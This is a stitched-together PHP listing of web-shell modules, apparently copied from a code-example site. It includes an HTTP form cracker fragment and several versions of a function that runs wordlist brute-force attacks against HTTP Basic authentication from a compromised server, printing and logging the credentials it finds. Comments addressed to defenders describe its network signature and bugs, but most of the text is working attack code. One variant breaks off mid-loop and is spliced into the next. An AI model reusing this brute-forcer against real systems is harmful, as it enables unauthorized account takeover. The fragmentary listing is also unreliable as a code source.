fclose($dictionary);
         echo "Done!</font><br>";
     } else {
         echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>{$hcwd}</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://" . getenv('HTTP_HOST') . 
"/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
     }
 }
 // Inline variant of the HTTP Basic-auth dictionary attack, selected when $act is "basicauth".
 // Everything it acts on (target, wordlist path, username, mode) comes from $_REQUEST.
 // NOTE(review): the listing ends inside the while loop below; the connection and
 // response handling of this variant are not shown on the page.
 if ($act == "basicauth") {
     global $errorbox, $et, $t, $crack, $hcwd;
     // Runs only when both a target and a wordlist path were submitted.
     if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) {
         $data = '';
         // Any truthy 'method' value selects POST; it is read without an isset() check.
         $method = $_REQUEST['method'] ? 'POST' : 'GET';
         // Split the target at the first '?': the query part goes to $data, the rest stays the target.
         if (strstr($_REQUEST['target'], '?')) {
             $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
             $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
         }
         // spliturL() is defined elsewhere; presumably it fills $host and $page by reference.
         spliturL($_REQUEST['target'], $host, $page);
         $type = $_REQUEST['combo'];
         $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : "";
         // This is an assignment, not a comparison: $method is 'GET' from here on,
         // so the traffic from this variant is GET regardless of what was selected.
         if ($method = 'GET') {
             $page .= $data;
         }
         // Opens a request-named path on the compromised host; the result is not checked.
         $dictionary = fopen($_REQUEST['dictionary'], 'r');
         echo "<font color=blue>";
         // One wordlist line per iteration.
         while (!feof($dictionary)) {
             if ($type) {
                 // Combo mode: each line is "user:password", split at the first ':'.
                 $combo = trim(fgets($dictionary), " \n\r");
                 $user = substr($combo, 0, strpos($combo, ':'));
                 $pass = substr($combo, strpos($combo, ':') + 1);
             } else {
                 // Simple mode: the line is the password; $user stays as submitted.
                 $pass = trim(fgets($dictionary), " \n\r");
             }
/**
 * Web-shell module: dictionary attack against HTTP Basic authentication.
 *
 * All inputs come from $_REQUEST: target, dictionary (wordlist path on this host),
 * method, combo, user, and the optional loG / logfilE pair. Without target and
 * dictionary, the function only prints its HTML form.
 *
 * Defender notes, as far as this listing shows:
 *  - Network: one new TCP connection to port 80 per candidate, each an HTTP/1.0
 *    request with the same header set (Accept-Encoding: text, Referer equal to
 *    the host, Connection: Close) and only the Authorization value changing.
 *  - Host: reads a request-named file and, when logging is enabled, writes hits
 *    to a request-named file. The form's default is a file named ".log" in the
 *    directory returned by whereistmP().
 *
 * spliturL(), file_add_contentS() and whereistmP() are defined elsewhere in the file.
 */
function authcrackeR()
{
    // HTML fragments defined elsewhere; they are interpolated into the output below.
    global $errorbox, $et, $t, $hcwd;
    // Runs only when both a target and a wordlist path were submitted.
    if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) {
        // Logging is enabled when loG is present and logfilE is non-empty.
        // The log path comes from the request without any validation.
        if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
            $log = 1;
            $file = $_REQUEST['logfilE'];
        } else {
            $log = 0;
        }
        $data = '';
        // The form submits 1 for POST and 0 for GET; any truthy value selects POST.
        $method = $_REQUEST['method'] ? 'POST' : 'GET';
        // Split the target at the first '?': the query part goes to $data, the rest stays the target.
        if (strstr($_REQUEST['target'], '?')) {
            $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
            $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
        }
        // Presumably fills $host and $page by reference; the helper is not shown here.
        spliturL($_REQUEST['target'], $host, $page);
        $type = $_REQUEST['combo'];
        $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
        // For GET the query text is appended directly to the page path.
        if ($method == 'GET') {
            $page .= $data;
        }
        // Opens a request-named path on the compromised host; the result is not checked.
        $dictionary = fopen($_REQUEST['dictionary'], 'r');
        echo '<font color=blue>';
        // One wordlist line, and one outbound connection, per iteration.
        while (!feof($dictionary)) {
            if ($type) {
                // Combo mode: each line is "user:password", split at the first ':'.
                $combo = trim(fgets($dictionary), " \n\r");
                $user = substr($combo, 0, strpos($combo, ':'));
                $pass = substr($combo, strpos($combo, ':') + 1);
            } else {
                // Simple mode: the line is the password; $user stays as submitted.
                $pass = trim(fgets($dictionary), " \n\r");
            }
            // Plain HTTP on port 80 with a 5-second connect timeout.
            $so = fsockopen($host, 80, $en, $es, 5);
            if (!$so) {
                echo "{$errorbox} Can not connect to host{$et}";
                break;
            } else {
                // The fixed header set built here is the network-visible signature of this module.
                $packet = "{$method} /{$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}");
                if ($method == 'POST') {
                    // Single-quoted string: the \\r\\n sequences are literal backslash
                    // characters, not CR/LF, and nothing ends the Authorization line first.
                    // POST-mode requests from this variant therefore carry this text on the
                    // Authorization header line.
                    $packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data);
                }
                $packet .= "\r\n\r\n";
                $packet .= $data;
                fputs($so, $packet);
                // Characters 9-10 of the status line: the first two digits of the status code.
                $res = substr(fgets($so), 9, 2);
                fclose($so);
                // A status starting with "20" is treated as a successful login.
                if ($res == '20') {
                    // The credential pair is printed to the page without HTML escaping.
                    echo "U: {$user} P: {$pass}</br>";
                    if ($log) {
                        // Hits are written in clear text to the request-named file
                        // (helper defined elsewhere; presumably it appends).
                        file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
                    }
                }
            }
        }
        echo 'Done!</font>';
    } else {
        // No target/dictionary submitted: print the form. The log field defaults to
        // whereistmP() . DIRECTORY_SEPARATOR . ".log".
        echo "<center><form method='POST' name=form>{$t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> {$hcwd} <input class=buttons type=submit value=Start></form>{$et}</center>";
    }
}
示例#3
/**
 * Web-shell module: dictionary attack against HTTP Basic authentication
 * (variant without result logging).
 *
 * All inputs come from $_REQUEST: target, dictionary (wordlist path on this host),
 * method, combo and user. Without target and dictionary, the function only
 * prints its HTML form.
 *
 * Defender notes, as far as this listing shows:
 *  - Network: one new TCP connection to port 80 per candidate, each an HTTP/1.0
 *    GET with the same header set (Accept-Encoding: text, Referer equal to the
 *    host, Connection: Close) and only the Authorization value changing.
 *  - Host: reads a request-named file. Hits are only echoed to the page.
 *
 * spliturL() and flusheR() are defined elsewhere in the file.
 */
function authcrackeR()
{
    // HTML fragments defined elsewhere; $crack is declared but not used in this body.
    global $errorbox, $et, $t, $crack, $hcwd;
    // Runs only when both a target and a wordlist path were submitted.
    if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) {
        $data = '';
        // The form submits 1 for POST and 0 for GET; any truthy value selects POST.
        $method = $_REQUEST['method'] ? 'POST' : 'GET';
        // Split the target at the first '?': the query part goes to $data, the rest stays the target.
        if (strstr($_REQUEST['target'], '?')) {
            $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
            $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
        }
        // Presumably fills $host and $page by reference; the helper is not shown here.
        spliturL($_REQUEST['target'], $host, $page);
        $type = $_REQUEST['combo'];
        $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : "";
        // This is an assignment, not a comparison: $method is 'GET' from here on,
        // so every request from this variant goes out as GET.
        if ($method = 'GET') {
            $page .= $data;
        }
        // Opens a request-named path on the compromised host; the result is not checked.
        $dictionary = fopen($_REQUEST['dictionary'], 'r');
        echo "<font color=blue>";
        // One wordlist line, and one outbound connection, per iteration.
        while (!feof($dictionary)) {
            if ($type) {
                // Combo mode: each line is "user:password", split at the first ':'.
                $combo = trim(fgets($dictionary), " \n\r");
                $user = substr($combo, 0, strpos($combo, ':'));
                $pass = substr($combo, strpos($combo, ':') + 1);
            } else {
                // Simple mode: the line is the password; $user stays as submitted.
                $pass = trim(fgets($dictionary), " \n\r");
            }
            // Plain HTTP on port 80 with a 5-second connect timeout.
            $so = fsockopen($host, 80, $en, $es, 5);
            if (!$so) {
                echo "{$errorbox} Can not connect to host{$et}";
                break;
            } else {
                // The fixed header set built here is the network-visible signature of this module.
                $packet = "{$method} /{$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}");
                // Not reached as written: $method was overwritten with 'GET' above.
                if ($method == 'POST') {
                    $packet .= "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: " . strlen($data);
                }
                $packet .= "\r\n\r\n";
                $packet .= $data;
                fputs($so, $packet);
                // Characters 9-10 of the status line: the first two digits of the status code.
                $res = substr(fgets($so), 9, 2);
                fclose($so);
                // A status starting with "20" is treated as a successful login.
                if ($res == '20') {
                    // The credential pair is printed to the page without HTML escaping.
                    echo "U: {$user} P: {$pass}</br>";
                }
                // Helper defined elsewhere; presumably flushes the output after each attempt.
                flusheR();
            }
        }
        echo "Done!</font>";
    } else {
        // No target/dictionary submitted: print the form.
        echo "<center><form method=\"POST\" name=form>{$t}HTTP Auth cracker:</td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>{$hcwd}<input class=buttons type=submit value=Start></td></tr></form></table></center>";
    }
}